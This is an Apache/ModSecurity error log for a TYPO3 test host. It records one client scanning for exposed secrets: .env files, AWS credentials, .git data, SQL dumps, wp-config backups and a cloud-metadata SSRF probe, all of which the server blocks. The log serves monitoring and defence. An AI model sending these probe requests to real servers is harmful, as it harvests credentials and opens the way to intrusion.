[Sun Mar 15 10:46:54.027410 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADgY2Zu5JILf9IpngaQAAAAc"]
[Sun Mar 15 10:46:54.027518 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "abaADgY2Zu5JILf9IpngaQAAAAc"]
[Sun Mar 15 10:46:54.049729 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "abaADgY2Zu5JILf9IpngagAAAAc"]
[Sun Mar 15 10:46:54.049878 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "abaADgY2Zu5JILf9IpngagAAAAc"]
[Sun Mar 15 10:46:54.049988 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "abaADgY2Zu5JILf9IpngagAAAAc"]
[Sun Mar 15 10:46:54.071966 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADgY2Zu5JILf9IpngawAAAAc"]
[Sun Mar 15 10:46:54.072232 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADgY2Zu5JILf9IpngawAAAAc"]
[Sun Mar 15 10:46:54.072411 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADgY2Zu5JILf9IpngawAAAAc"]
[Sun Mar 15 10:46:54.072526 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "abaADgY2Zu5JILf9IpngawAAAAc"]
[Sun Mar 15 10:46:54.094779 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "abaADgY2Zu5JILf9IpngbAAAAAc"]
[Sun Mar 15 10:46:54.095130 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "abaADgY2Zu5JILf9IpngbAAAAAc"]
[Sun Mar 15 10:46:54.095252 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "abaADgY2Zu5JILf9IpngbAAAAAc"]
[Sun Mar 15 10:46:54.521918 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Pattern match "^(?i:file|ftps?|https?):\\\\/\\\\/(?:\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "54"] [id "931100"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "surf.test.indacotrentino.com"] [uri "/test"] [unique_id "abaADgY2Zu5JILf9IpngeAAAAAc"]
[Sun Mar 15 10:46:54.522255 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test"] [unique_id "abaADgY2Zu5JILf9IpngeAAAAAc"]
[Sun Mar 15 10:46:54.522403 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test"] [unique_id "abaADgY2Zu5JILf9IpngeAAAAAc"]
[Sun Mar 15 10:46:54.581265 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Sun Mar 15 10:46:54.604307 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/awc_prod.sql
[Sun Mar 15 10:46:54.627744 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.AWS/credentials"] [unique_id "abaADgY2Zu5JILf9IpngfAAAAAc"]
[Sun Mar 15 10:46:54.627941 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.AWS/credentials"] [unique_id "abaADgY2Zu5JILf9IpngfAAAAAc"]
[Sun Mar 15 10:46:54.628086 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.AWS/credentials"] [unique_id "abaADgY2Zu5JILf9IpngfAAAAAc"]
[Sun Mar 15 10:46:54.859696 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 15 10:46:54.881724 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 15 10:46:54.903774 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 15 10:46:54.925818 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 15 10:46:54.947800 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git-credentials
[Sun Mar 15 10:46:54.971720 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "abaADgY2Zu5JILf9IpngiAAAAAc"]
[Sun Mar 15 10:46:54.971912 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "abaADgY2Zu5JILf9IpngiAAAAAc"]
[Sun Mar 15 10:46:54.972046 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "abaADgY2Zu5JILf9IpngiAAAAAc"]
[Sun Mar 15 10:46:55.029614 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abaADwY2Zu5JILf9IpngigAAAAc"]
[Sun Mar 15 10:46:55.029804 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abaADwY2Zu5JILf9IpngigAAAAc"]
[Sun Mar 15 10:46:55.029936 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abaADwY2Zu5JILf9IpngigAAAAc"]
[Sun Mar 15 10:46:55.051833 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Sun Mar 15 10:46:55.073991 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htpasswd
[Sun Mar 15 10:46:55.204101 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.sql
[Sun Mar 15 10:46:55.226386 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Sun Mar 15 10:46:55.248544 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Sun Mar 15 10:46:55.270644 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/mysql.sql
[Sun Mar 15 10:46:55.293527 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sql.sql
[Sun Mar 15 10:46:55.315779 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Sun Mar 15 10:46:55.337972 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/old.sql
[Sun Mar 15 10:46:55.360670 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abaADwY2Zu5JILf9IpnglwAAAAc"]
[Sun Mar 15 10:46:55.360841 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abaADwY2Zu5JILf9IpnglwAAAAc"]
[Sun Mar 15 10:46:55.360971 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abaADwY2Zu5JILf9IpnglwAAAAc"]
[Sun Mar 15 10:46:55.383228 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Sun Mar 15 10:46:55.406256 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "abaADwY2Zu5JILf9IpngmQAAAAc"]
[Sun Mar 15 10:46:55.406458 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "abaADwY2Zu5JILf9IpngmQAAAAc"]
[Sun Mar 15 10:46:55.406581 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.save"] [unique_id "abaADwY2Zu5JILf9IpngmQAAAAc"]
[Sun Mar 15 10:46:55.428413 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php~
[Sun Mar 15 10:46:55.556724 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Mar 15 10:46:55.578885 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml
[Sun Mar 15 10:46:55.636528 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sun Mar 15 10:46:55.658689 2026] [authz_core:error] [pid 2711295] [client 185.177.72.49:63276] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sun Mar 15 10:46:55.750727 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abaADwY2Zu5JILf9IpngpQAAAAc"]
[Sun Mar 15 10:46:55.750902 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abaADwY2Zu5JILf9IpngpQAAAAc"]
[Sun Mar 15 10:46:55.751023 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abaADwY2Zu5JILf9IpngpQAAAAc"]
[Sun Mar 15 10:46:55.773573 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "abaADwY2Zu5JILf9IpngpgAAAAc"]
